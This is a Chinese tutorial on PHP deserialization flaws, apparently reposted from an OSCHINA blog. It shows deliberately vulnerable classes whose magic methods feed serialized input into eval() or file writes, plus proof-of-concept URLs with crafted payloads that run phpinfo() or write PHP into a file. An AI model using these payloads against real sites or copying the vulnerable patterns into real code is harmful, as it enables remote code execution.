反序列化本身是沒有漏洞的，但是當反序列化和一些魔術(shù)方法結(jié)合使用時就可能會產(chǎn)生安全風險。常用的魔術(shù)方法__wakeup

反序列化漏洞示例(__wekeup)

class A{var $test = "demo";function __wakeup(){eval($this->test);}}$b = new A();$c = serialize($b);$a = $_GET['test'];$a_unser = unserialize($a);#漏洞利用poc http://127.0.0.1:8999/test/unserialize1.php?test=O:1:"A":1:{s:4:"test";s:10:"phpinfo();";}

解釋：傳入的參數(shù)被反序列化，導致魔術(shù)方法__wakeup被自動調(diào)用，這時參數(shù)傳入的值將被作為eval的參數(shù)使用，所以這里會因反序列化導致任意代碼執(zhí)行。

反序列化漏洞(__wakeup和文件操作)

require "test.php";//測試方便class A{var $test = '123';function __wakeup(){$fp = fopen("test.php", "w");fwrite($fp, $this->test);fclose($fp);}}$a = new A();print_r(serialize($a));$class1 = $_GET['test'];$class1_unser = unserialize($class1);利用poc：http://127.0.0.1:8999/test/unserialize1.php?test=O:1:"A":1:{s:4:"test";s:18:"<?php phpinfo();?>";}

解釋：和上面一一樣，當傳入的參數(shù)被反序列化時，魔術(shù)方法__wakeup被調(diào)用，傳入的參數(shù)會作為fwrite的第二個參數(shù)直接寫入test.php文件中，從而導致反序列化漏洞

反序列化漏洞示例(__construct)

require 'test.php';class b{function __construct($test){$fp = fopen("test.php", 'w');fwrite($fp, $test);fclose($fp);}}class a{var $test = 123;function __wakeup(){$obj = new b($this->test);}}$class = $_GET['test'];$class_u = unserialize($class);利用poc：http://127.0.0.1:8999/test/unserialize1.php?test=O:1:"A":1:{s:4:"test";s:18:"<?php phpinfo();?>";}

解釋：unserialize()會自動調(diào)用__wakeup(),__wakeup中實力化a,這時會調(diào)用構(gòu)造函數(shù)__construct，因為構(gòu)造函數(shù)被調(diào)用，所傳入的參數(shù)會作為fwrite的參數(shù)寫入shell.php文件，從而造成代碼執(zhí)行

類的普通方法——反序列化問題

class maniac{public $test;function __construct(){$this->test = new x1();}function __destruct(){$this->test->action();}}class x1{function action(){echo "123";}}class x2{public $test2;function action(){eval($this->test2);}}$class2 = new maniac();unserialize($_GET['test']);漏洞利用poc:http://127.0.0.1:8999/test/unserialize1.php?test=O:6:"maniac":1:{s:4:"test";O:2:"x2":1:{s:5:"test2";s:10:"phpinfo();";}}

解釋：maniac實例化，構(gòu)造方法(\_\_construct)被調(diào)用，x1被示例化；反序列執(zhí)行，析構(gòu)方法(\_\_destreuct)被調(diào)用；如果$\_GET沒有傳入合法的序列化字符串，就會自動調(diào)用x1的action方法，如果$\_GET接收到正確的序列化字符串，那么析構(gòu)方法就會調(diào)用x2的action方法，從而這里就有可能導致任意命令執(zhí)行

總結(jié)

以上是生活随笔為你收集整理的C php反序列化,php反序列化漏洞 - anansec的个人空间 - OSCHINA - 中文开源技术交流社区...的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。